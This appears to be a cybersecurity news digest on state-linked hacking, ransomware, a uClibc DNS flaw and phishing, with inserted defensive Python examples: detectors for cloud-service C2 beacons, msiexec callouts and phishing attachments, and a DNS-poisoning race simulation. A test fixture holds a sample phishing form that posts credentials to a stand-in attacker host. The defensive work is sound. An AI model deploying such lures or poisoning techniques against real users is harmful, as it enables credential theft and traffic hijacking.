DDoS attack on Romanian government attributed to Killnet.
Romanian authorities have attributed last week's distributed denial-of-service (DDoS) attack on government websites to Killnet, a threat actor that specializes in DDoS attacks conducted in Russia's interest, the Record reports. The attack affected Romania's Ministry of Defense, its border police, the national railway, and OTP Bank. Killnet claimed the attacks were retaliation for Romania's support of Ukraine in the face of Russia's invasion.
The Romanian Intelligence Service reported that the attacks began around 4 am and that the sites were down for several hours, stating, “Following the investigations carried out by the CYBERINT National Center within the Romanian Intelligence Service, it was established that the cyberattackers used network equipment from outside Romania. The attackers took control of the equipment in question by exploiting cybersecurity vulnerabilities [and] the lack of cybersecurity measures and used them as a vector of attack on sites in Romania.” The National Directorate of Cyber Security (DNSC) says it plans to release a list of the IP addresses involved in the attack as it works to resolve the resulting issues.
Sabotage incident in France highlights vulnerabilities in infrastructure.
CyberScoop reports that the sabotage incident in which fiber-optic cables in France were cut, severing Internet and telecommunications connections, is seen as demonstrating how vulnerable infrastructure is to physical disruption. The incident remains under investigation. The sabotage is regarded as coordinated, but there has so far been no attribution.
“When you think about the attack and the amount of fiber optic cable that’s out there, it would be hard to protect. This is a target that is not that hard to go after,” said Bob Kolasky, former Director of the Cybersecurity and Infrastructure Security Agency’s National Risk Management Center, where he served from 2018 until March 2022. He called the attack “more significant than anything we’ve ever seen.” Observers point to the context: the war in Ukraine and the recent defeat of far-right nationalist candidate Marine Le Pen, who for years supported Vladimir Putin. Kolasky stated, “Given what’s going on with the larger conflict with Russia, you have to be a little bit paranoid this is a case of Russian aggression. Events like this will get the attention of the White House and the agency and security professionals because we’re just worried about escalation potentially affecting critical infrastructure.”
CyberScoop also quotes Marek Posard, a military sociologist at the RAND Corporation who researches disinformation, whose concern is that “adversaries might target fringe groups — who are already ginned up following a contentious election in France — with the hopes that some of these fringe groups will launch attacks on their own country.”
Cozy Bear threat actor engaging in cyberespionage targeting diplomats.
Cozy Bear (also called Nobelium or APT29; a threat actor associated with Russia’s SVR foreign intelligence service) continues to conduct cyberespionage against a wide range of diplomatic targets. The campaigns gain initial access through spearphishing, and they are marked, BleepingComputer reports, by the abuse of “Atlassian Trello, and other legitimate cloud service platforms, for command and control (C2) communication.”
Mandiant reports that beginning in mid-January 2022 it detected and responded to an APT29 phishing campaign against a diplomatic entity, and that in the course of investigating it found additional diplomatic and government entities had been targeted. The campaign used compromised legitimate email addresses and disguised its messages as administrative notices relating to various embassies. The activity resembles earlier Nobelium campaigns, which also targeted diplomats and diplomatic entities, used ROOTSAW to deliver payloads, and abused Firebase or Dropbox for C2. Routing C2 through Trello, Firebase, and Dropbox was most likely intended to make the activity harder to detect, and harder to remediate, since a victim organization can rarely block such widely used services outright.
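C2 tunnelled through Trello, Firebase, or Dropbox is hard to block by destination, so defenders usually look for how the traffic behaves rather than where it goes. The following is an added example, not code from Mandiant or BleepingComputer: it groups constructed proxy-log records by (host, process, destination) for those services and flags series whose inter-request intervals are nearly constant (beaconing) or that originate from a process that is not a browser. The log format, host names, process names, and thresholds are assumptions for the demonstration.

```python
"""Beacon detection for C2 hidden in legitimate cloud services (added example)."""
from collections import defaultdict
from statistics import mean, pstdev

# Services the page names as abused for C2; matched by domain suffix.
CLOUD_C2_SUFFIXES = ("trello.com", "firebaseio.com", "dropbox.com", "dropboxapi.com")
BROWSERS = {"chrome.exe", "firefox.exe", "msedge.exe"}

# Constructed sample proxy log (assumed format: epoch host process dest path).
# Not real telemetry. 12 requests every ~300 s with small jitter from rundll32.exe,
# plus a user's irregular browser traffic to Trello and some unrelated traffic.
_BASE = 1651482000
_JITTER = [0, 3, -2, 5, 1, -4, 2, 0, 6, -3, 1, 2]
SAMPLE_PROXY_LOG = [
    f"{_BASE + 300 * i + j} ws-ops-17 rundll32.exe api.trello.com /1/cards/abc123"
    for i, j in enumerate(_JITTER)
] + [
    f"{_BASE + d} ws-fin-042 chrome.exe trello.com /b/board/planning"
    for d in (0, 47, 610, 1900, 2100, 2105, 5000, 7300, 9000)
] + [
    f"{_BASE + 10} ws-fin-042 chrome.exe www.example.com /",
    f"{_BASE + 20} ws-ops-17 rundll32.exe www.example.com /",
]


def _suffix_match(host, suffixes):
    return any(host == s or host.endswith("." + s) for s in suffixes)


def parse(lines):
    """Yield (timestamp, host, process, dest, path) from the assumed log format."""
    for line in lines:
        ts, host, proc, dest, path = line.split(maxsplit=4)
        yield float(ts), host, proc.lower(), dest.lower(), path


def find_beacons(lines, min_requests=8, max_cv=0.15):
    """Return suspicious series of requests to the cloud services above.

    A series is reported when its gaps are periodic (coefficient of variation
    <= max_cv) or when the requesting process is not a browser.
    """
    series = defaultdict(list)
    for ts, host, proc, dest, _ in parse(lines):
        if _suffix_match(dest, CLOUD_C2_SUFFIXES):
            series[(host, proc, dest)].append(ts)

    findings = []
    for (host, proc, dest), stamps in series.items():
        if len(stamps) < min_requests:
            continue  # too few samples to judge periodicity
        stamps.sort()
        gaps = [b - a for a, b in zip(stamps, stamps[1:])]
        avg = mean(gaps)
        cv = pstdev(gaps) / avg if avg else float("inf")
        reasons = []
        if cv <= max_cv:
            reasons.append(f"periodic: {len(gaps)} gaps, mean {avg:.0f}s, cv {cv:.2f}")
        if proc not in BROWSERS:
            reasons.append(f"non-browser process {proc}")
        if reasons:
            findings.append({"host": host, "process": proc, "dest": dest,
                             "requests": len(stamps), "reasons": reasons})
    return findings


if __name__ == "__main__":
    for f in find_beacons(SAMPLE_PROXY_LOG):
        print(f"{f['host']} {f['process']} -> {f['dest']} ({f['requests']} req): "
              + "; ".join(f["reasons"]))
```

In production the non-browser rule needs an allowlist for legitimate sync clients (the Dropbox desktop client, for instance) and the periodicity check should tolerate the jitter real implants add; the point is that the destination alone carries no signal once the adversary is using the same SaaS your users do.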
REvil seems to be returning.
There’s more evidence that the REvil ransomware gang is back from what appears to have been a temporary occultation. Its Tor infrastructure has come back online, BleepingComputer says, and researchers have been looking for code that could be attributed to the gang. Researchers at Avast found samples (confirmed by researcher R3MRUM) that appear to connect the new activity to REvil. A rebranding appears to be underway, but the gang seems careless about covering its tracks.
Vulnerability reported affecting DNS implementation of uClibc and uClibc-ng.
Nozomi Networks reports a vulnerability (ICS-VU-638779, VU#473698) in the Domain Name System implementation of all versions of uClibc and uClibc-ng, C standard libraries widely used in IoT products. The flaw exposes affected devices to DNS poisoning attacks.
uClibc is used by major vendors including Netgear and Linksys, and was formerly used by Axis. The vulnerability remains unpatched; the library maintainer has not yet been able to develop a fix. While it remains unpatched, Nozomi has not disclosed which devices it reproduced the vulnerability on. It did report that a wide range of IoT devices running current firmware are affected, and that such devices are likely to be deployed across critical infrastructure.
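DNS poisoning against a stub resolver comes down to a race: an off-path attacker floods forged answers while the resolver waits for the real one, and the only things the resolver can check are the 16-bit transaction ID and the UDP source port of its outstanding query. The simulation below is an added example, not code from Nozomi's advisory or from uClibc, and does not reproduce the uClibc bug itself; it models two resolver behaviours (sequential vs. random transaction IDs, fixed vs. random source port) and measures how often a spray of 64 guesses poisons the cache. Names, addresses, and the attacker model (can induce lookups, cannot sniff) are assumptions.

```python
"""DNS cache-poisoning race against predictable vs. random query parameters (added example)."""
import random
from dataclasses import dataclass, field


@dataclass
class PendingQuery:
    txid: int    # 16-bit DNS transaction ID
    sport: int   # UDP source port the query was sent from
    qname: str


@dataclass
class Resolver:
    predictable_txid: bool   # sequential IDs (the weak behaviour) vs. random
    random_port: bool        # random ephemeral port vs. a fixed port 53
    rng: random.Random = field(default_factory=lambda: random.Random(1))
    next_txid: int = 0x1000
    cache: dict = field(default_factory=dict)

    def send_query(self, qname: str) -> PendingQuery:
        if self.predictable_txid:
            txid = self.next_txid
            self.next_txid = (self.next_txid + 1) & 0xFFFF   # trivially guessable
        else:
            txid = self.rng.randrange(1 << 16)
        sport = self.rng.randrange(1024, 1 << 16) if self.random_port else 53
        return PendingQuery(txid, sport, qname)

    def receive(self, pending: PendingQuery, txid: int, dport: int,
                qname: str, answer: str) -> bool:
        """Accept a response only if it matches the outstanding query.

        Real resolvers also check the source IP and the question section;
        the ID/port comparison is the part a predictable ID undermines.
        """
        if qname in self.cache:
            return False   # first answer wins; late replies are ignored
        if txid != pending.txid or dport != pending.sport or qname != pending.qname:
            return False
        self.cache[qname] = answer
        return True


def poison_rate(predictable_txid: bool, random_port: bool,
                guesses: int = 64, trials: int = 200) -> float:
    """Fraction of trials in which forged answers beat the legitimate one."""
    resolver = Resolver(predictable_txid, random_port)
    victim = "update.example"          # assumed name the attacker wants to hijack
    poisoned = 0
    for _ in range(trials):
        resolver.cache.clear()
        # The attacker first induces a lookup of a name it controls, so its own
        # nameserver observes the resolver's current transaction ID.
        observed = resolver.send_query("probe.attacker.example")
        pending = resolver.send_query(victim)
        # Forged replies sprayed before the real answer can arrive. The attacker
        # cannot see the source port, so it guesses the conventional 53.
        for i in range(guesses):
            forged_id = (observed.txid + 1 + i) & 0xFFFF
            if resolver.receive(pending, forged_id, 53, victim, "198.51.100.13"):
                poisoned += 1
                break
        # Legitimate answer arrives last; ignored if the cache is already poisoned.
        resolver.receive(pending, pending.txid, pending.sport, victim, "203.0.113.7")
    return poisoned / trials


if __name__ == "__main__":
    for txid_mode, port_mode in [(True, False), (True, True), (False, False), (False, True)]:
        print(f"sequential txid={txid_mode!s:5} random port={port_mode!s:5} "
              f"poisoned {poison_rate(txid_mode, port_mode):.1%}")
```

With sequential IDs and a fixed port every trial is poisoned on the first guess; randomizing either the ID or the port drops the rate to the roughly 64/65536 the spray size allows, and randomizing both leaves the off-path attacker nothing to guess. For an unpatched device the practical mitigations follow from the model: put a validating, port-randomizing recursive resolver between the device and the Internet, and keep its DNS traffic off untrusted networks.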
Moshen Dragon threat actor operating in Central Asia.
SentinelLabs has been following the activities of “Moshen Dragon,” which it describes as “a Chinese-aligned cyberespionage threat actor operating in Central-Asia.” Moshen Dragon’s approach is notable for its “trial-and-error abuse of traditional antivirus products to attempt to sideload malicious DLLs.”
Chinese APT resurfacing.
Another Chinese APT (variously called Lotus Panda, Override Panda, or Naikon) has resurfaced after a period of occultation. Cluster25 has been tracking the APT’s cyberespionage against ASEAN nations.
ASEAN nations are likely being targeted because of their ties with the West and their market-oriented economies, which make them plausible holders of sensitive foreign-affairs or military information that the APT could acquire and exploit in China’s interest. That is consistent with the group’s earlier targeting of government agencies and military organizations in South Asia, where most government targets were foreign-affairs and science-and-technology bodies. Analysis of the group’s toolset found that it typically engages in long-term espionage and intelligence collection.
BlackBasta ransomware possibly linked to Conti gang.
SecurityWeek reports that security firms have been seeing evidence suggesting links between the recently observed BlackBasta ransomware operation and the Conti gang. BlackBasta’s high-profile victims have included Deutsche Windtechnik and the American Dental Association. Researchers at Minerva believe each BlackBasta sample is specially created for a specific victim, “as a company id is hardcoded into the ransom note as well as a public key.”
Conti and Hive gang chats leaked.
Cisco Talos researchers have released the results of their study of leaked Conti and Hive ransomware gang chats. Both groups do extensive pre-attack research into prospective victims, and both gangs negotiate their demands (and are quick to lower them, presumably on the proverbial grounds that half a loaf is better than none). Conti is hands down the more professional of the two, with Hive exhibiting a crudely direct approach to extortion as well as slipshod opsec.
Cuckoo Bees attack targets intellectual property.
Cybereason today described “Cuckoo Bees,” which it characterizes as a “massive” Chinese cyberespionage effort directed at stealing US firms’ intellectual property.
Cybereason attributes Cuckoo Bees to Winnti, a Chinese APT that operates on behalf of Chinese state interests and specializes in cyberespionage and intellectual property theft. The campaign, which targeted technology and manufacturing companies across North America, Europe, and Asia, had been running since at least 2019 and went undetected until it was discovered in 2021. The investigation surfaced a previously unknown Winnti malware strain, DEPLOYLOG, along with new versions of existing Winnti tools. The actor was also observed abusing the Windows Common Log File System (CLFS) by stashing a payload inside a CLFS log file, a technique rarely seen in the wild.
Four strains of ransomware tied to North Korea’s Lazarus Group.
Trellix researchers reported yesterday that Pyongyang has made another foray into the ransomware market. Trellix has tied four strains of ransomware (BEAF, PXJ, ZZZZ, and CHiCHi) to North Korea’s Unit 180, also known as APT38 and as the Lazarus Group. The New Yorker boggles at the group’s “incredible rise,” but Unit 180 has been making a pest of itself for some time. Trellix speculates that the East Asian target set being prospected in these recent campaigns, and the campaigns’ relatively small and selective scale, suggest that Unit 180 is testing whether a resurgent ransomware effort would be profitable.
Cyberespionage group targeting corporate email accounts.
Mandiant is tracking a cyberespionage group it follows as UNC3524 that has taken an interest in corporate email accounts associated with companies engaged in large financial transactions, especially those related to mergers and acquisitions. UNC3524 is noteworthy for its ability to achieve undetected persistence in targeted networks, an ability Mandiant attributes to a novel backdoor, “QuietExit,” which has enabled the threat actor to establish itself for as long as eighteen months before being detected. While the researchers find overlaps in technique between UNC3524 and both Cozy Bear (Russia’s SVR) and Fancy Bear (Russia’s GRU), they so far lack sufficient evidence for definitive attribution.
Log4j vulnerability difficult to detect.
Researchers at Cequence warn that the Log4j vulnerability may be more widespread and harder to detect than initially thought. The researchers say they “found unpatched servers within our customers’ digital supply chain that appeared some 15 hours after the initial test results were received.”
CISA reported that Log4j was the most exploited vulnerability of 2021, and Cequence researchers say there are likely more unpatched Log4j instances than are known, suggesting that initial vulnerability testing has focused too narrowly on the immediate blast radius. Of the 50 organizations analyzed, 36% were still vulnerable; universities and financial services topped the risk list, while retail and healthcare fared better at the bottom. Security experts agree that Log4j will remain a risk for the foreseeable future.
US Cyber Command sends team to Lithuania to help with defensive cyber operations.
US Cyber Command’s Cyber National Mission Force (CNMF) recently sent a team to Lithuania to assist in the country’s defensive cyber operations. Cyber Command stated, “At the invitation of the Lithuanian government, U.S. Cyber Command’s Cyber National Mission Force deployed a hunt forward team to conduct defensive cyber operations alongside partner cyber forces, concluding in May. For three months, the U.S. cyber operators hunted for malicious cyber activity on key Lithuanian national defense systems and Ministry of Foreign Affairs’ networks alongside its allies. This was the first shared defensive cyber operation between Lithuanian cyber forces and CNMF in their country.”
Anonymous leaks Nauru Police emails.
Anonymous has non-Russian targets, too. HackRead reports that the loose hacker collective Anonymous has leaked 82 GB worth of emails allegedly belonging to the Nauru Police Force. Anonymous claims the leak is meant to expose alleged abuses committed by the police on the island, which has been used as an immigration detention center by the Australian government.
Anonymous says the leaked emails document the alleged abuses. The group also issued a list of demands: an end to Australia’s policy of mandatory immigration detention, closure of immigration detention centers including those on Nauru, permanent residence for all asylum seekers, investigation of the abuse allegations in the detention centers, and lifetime reparations for victims.
Raspberry Robin worm distributed through USB drives.
Red Canary is tracking malicious activity it calls Raspberry Robin, a worm that is usually installed from a USB drive. “This activity cluster relies on msiexec.exe to call out to its infrastructure, often compromised QNAP devices, using HTTP requests that contain a victim’s user and device names. We also observed Raspberry Robin use TOR exit nodes as additional command and control (C2) infrastructure.” Who the threat actor is and what their objectives are remain obscure.
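The two behaviours Red Canary describes, msiexec.exe making outbound HTTP requests and the victim's user and device names appearing in those requests, are both visible in EDR network events joined with proxy logs. The triage routine below is an added example, not code from Red Canary: it runs over constructed event records (assumed field names host, user, process, url) and reports msiexec.exe requests whose URL path or query string carries the requesting host's own name or the logged-on user's name, ranking a hit on both identifiers higher than a hit on one.

```python
"""Flag msiexec.exe callouts that embed the victim's host and user names (added example)."""
from urllib.parse import unquote, urlsplit

# Constructed sample records as a SIEM might join them from EDR (process) and
# proxy (url) telemetry. Not real data; IPs are documentation ranges.
SAMPLE_EVENTS = [
    {"host": "WS-FIN-042", "user": "jdoe",
     "process": r"C:\Windows\System32\msiexec.exe",
     "url": "http://203.0.113.25:8080/ws-fin-042?jdoe"},
    {"host": "WS-FIN-042", "user": "jdoe",
     "process": r"C:\Windows\System32\msiexec.exe",
     "url": "http://203.0.113.25:8080/WS-FIN-042/"},
    {"host": "WS-FIN-042", "user": "jdoe",
     "process": r"C:\Windows\System32\msiexec.exe",
     "url": "https://download.vendor.example/installer/agent.msi"},   # routine install
    {"host": "WS-FIN-042", "user": "jdoe",
     "process": r"C:\Program Files\Mozilla Firefox\firefox.exe",
     "url": "https://intranet.example/profile/jdoe"},                 # browser, not msiexec
]


def is_msiexec(process_path: str) -> bool:
    """True when the image file name is msiexec.exe, whatever the directory."""
    basename = process_path.replace("/", "\\").rsplit("\\", 1)[-1]
    return basename.lower() == "msiexec.exe"


def victim_identifiers_in_url(event: dict) -> list:
    """Which of the victim's own identifiers (host, user) appear in the URL path/query."""
    parts = urlsplit(event["url"])
    haystack = unquote(parts.path + "?" + parts.query).lower()
    return [key for key in ("host", "user") if event[key].lower() in haystack]


def triage(events: list) -> list:
    """Return findings for msiexec.exe HTTP(S) requests that leak victim identifiers."""
    findings = []
    for ev in events:
        if not is_msiexec(ev["process"]):
            continue
        parts = urlsplit(ev["url"])
        if parts.scheme not in ("http", "https"):
            continue
        leaked = victim_identifiers_in_url(ev)
        if not leaked:
            continue   # msiexec fetching an installer by plain URL is common and benign
        findings.append({
            "host": ev["host"],
            "url": ev["url"],
            "leaked": leaked,
            "severity": "high" if len(leaked) == 2 else "medium",
        })
    return findings


if __name__ == "__main__":
    for f in triage(SAMPLE_EVENTS):
        print(f"[{f['severity']}] {f['host']} msiexec.exe -> {f['url']} leaks {f['leaked']}")
```

Short user names (three or four letters) will match inside ordinary path segments, so in practice gate the user check on a minimum length or anchor it to path boundaries; the host-name match is the more reliable of the two signals.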
Evasive phishing campaign targets corporate networks.
Menlo Labs describes a credential phishing campaign that uses malicious HTML attachments to gain access to corporate networks. The researchers classify the operation as a Highly Evasive Adaptive Threat (HEAT) capable of evading many legacy security tools. The lures are carefully tailored to the targets.
The campaign delivers HTML attachments in emails to potential victims. Secure email gateways (SEGs) treat HTML attachments differently from other attachment types and do not usually block them, because large financial firms routinely send legitimate encrypted messages as HTML attachments. The lures are tailored to services the target’s company actually uses, which makes the email and attachment look more legitimate. When the victim opens the attachment, it prompts them to log into one of those services; if the credentials are correct, they are sent to the attacker.
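Because an SEG cannot simply block HTML attachments without breaking legitimate secure-mail notices, the useful check is structural: does the attachment contain a credential form, and where does that form send its data? The scanner below is an added example and not code from Menlo Labs; it parses an attachment with the standard-library HTML parser, scores password forms whose action points outside an assumed set of trusted domains, password forms with no action at all (typically submitted by script), and scripts that build content dynamically. The two sample attachments and the trusted domain are constructed for the demonstration.

```python
"""Static triage of HTML attachments for credential-phishing forms (added example)."""
import re
from html.parser import HTMLParser
from urllib.parse import urlsplit

# JavaScript calls commonly used to unpack or inject a hidden login page.
OBFUSCATION = re.compile(r"\b(atob|unescape|String\.fromCharCode|document\.write)\s*\(")


class AttachmentScanner(HTMLParser):
    """Collect forms (with whether they take a password), scripts and meta refreshes."""

    def __init__(self):
        super().__init__()
        self.forms, self.scripts, self.meta_refresh = [], [], []
        self._form = None
        self._in_script = False

    def handle_starttag(self, tag, attrs):
        a = {k.lower(): (v or "") for k, v in attrs}
        if tag == "form":
            self._form = {"action": a.get("action", ""), "password": False}
            self.forms.append(self._form)
        elif tag == "input" and self._form is not None and a.get("type", "").lower() == "password":
            self._form["password"] = True
        elif tag == "script":
            self._in_script = True
        elif tag == "meta" and a.get("http-equiv", "").lower() == "refresh":
            self.meta_refresh.append(a.get("content", ""))

    def handle_endtag(self, tag):
        if tag == "form":
            self._form = None
        elif tag == "script":
            self._in_script = False

    def handle_data(self, data):
        if self._in_script:
            self.scripts.append(data)


def _trusted(host, trusted_domains):
    return any(host == d or host.endswith("." + d) for d in trusted_domains)


def score_attachment(html: str, trusted_domains) -> dict:
    """Return {'score': int, 'reasons': [...]}; higher means more phish-like."""
    scanner = AttachmentScanner()
    scanner.feed(html)
    score, reasons = 0, []
    for form in scanner.forms:
        if not form["password"]:
            continue
        host = urlsplit(form["action"]).hostname or ""
        if not host:
            score += 2
            reasons.append("password form with no/relative action (script-submitted?)")
        elif not _trusted(host, trusted_domains):
            score += 3
            reasons.append(f"password form posts to external host {host}")
    tokens = sorted({m.group(1) for s in scanner.scripts for m in OBFUSCATION.finditer(s)})
    if tokens:
        score += 2
        reasons.append("dynamically built content: " + ", ".join(tokens))
    for content in scanner.meta_refresh:
        host = urlsplit(content.split("url=", 1)[-1]).hostname or ""
        if host and not _trusted(host, trusted_domains):
            score += 1
            reasons.append(f"meta refresh to external host {host}")
    return {"score": score, "reasons": reasons}


# Constructed samples: a lure imitating a bank's secure-message notice, and a
# benign notice whose form posts to the bank's own domain.
PHISH_HTML = """<html><body><p>Your Acme Bank secure message is ready.</p>
<form method="post" action="https://acme-secure-login.example.net/auth.php">
<input type="email" name="u"><input type="password" name="p">
<input type="submit" value="View message"></form>
<script>document.write(atob("PGRpdj5sb2FkaW5nPC9kaXY+"));</script></body></html>"""
BENIGN_HTML = """<html><body><p>Your Acme Bank secure message is ready.</p>
<form method="post" action="https://securemail.acmebank.example/open">
<input type="password" name="p"><input type="submit" value="Open"></form></body></html>"""
TRUSTED = ("acmebank.example",)

if __name__ == "__main__":
    for name, doc in (("phish", PHISH_HTML), ("benign", BENIGN_HTML)):
        print(name, score_attachment(doc, TRUSTED))
```

The trusted-domain list is the weak point: it has to be maintained per sender, and a lure that copies a real secure-mail template will pass every check except the action host, which is why that single check carries the most weight here.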
Keeping a keen eye out for Mother’s Day scams.
This Sunday is Mother’s Day in the US and other jurisdictions where the greeting card companies’ writ runs, and Trend Micro offers some timely advice on avoiding being scammed in the course of rendering annual honors to Mater. They flag three scam websites in particular, and point out that they bear the usual marks of fraud: unusual payment methods (like wire transfers), an inappropriate curiosity about personal information, misspellings and non-standard usage, no genuine customer reviews, and the infallible, by this shall ye know the scammer, deal that’s too good to be true. So stay safe online (Mom would want that for you).
The US Cybersecurity and Infrastructure Security Agency (CISA) issued an industrial control system advisory Tuesday for Yokogawa CENTUM and ProSafe-RS. Another industrial control system security advisory affecting Johnson Controls Metasys was released Friday.
The US Cybersecurity and Infrastructure Security Agency (CISA) has added five vulnerabilities to its Known Exploited Vulnerabilities Catalog. Two of the vulnerabilities affect Apple products (CVE-2019-8506 and CVE-2021-1789), one affects Microsoft’s Win32k driver (CVE-2014-4113), one impacts Internet Explorer (CVE-2014-0322), and one affects OpenSSL (CVE-2014-0160). Agencies are required to patch the vulnerabilities by May 25th.
Policies, procurements, and agency equities.
A US National Security Memorandum has been released warning of the risks quantum computing could pose to civilian and military communications and online financial transactions, since a sufficiently capable quantum computer could break the public-key cryptography on which most digital systems currently rely. The document outlines a plan for multi-agency coordination to migrate vulnerable systems to quantum-resistant cryptography. NSA and NIST will develop and publish new quantum-resistant cryptographic standards by 2024.
The Record reports that General Paul Nakasone has been asked to extend his four-year tour at the head of US Cyber Command and NSA for another year.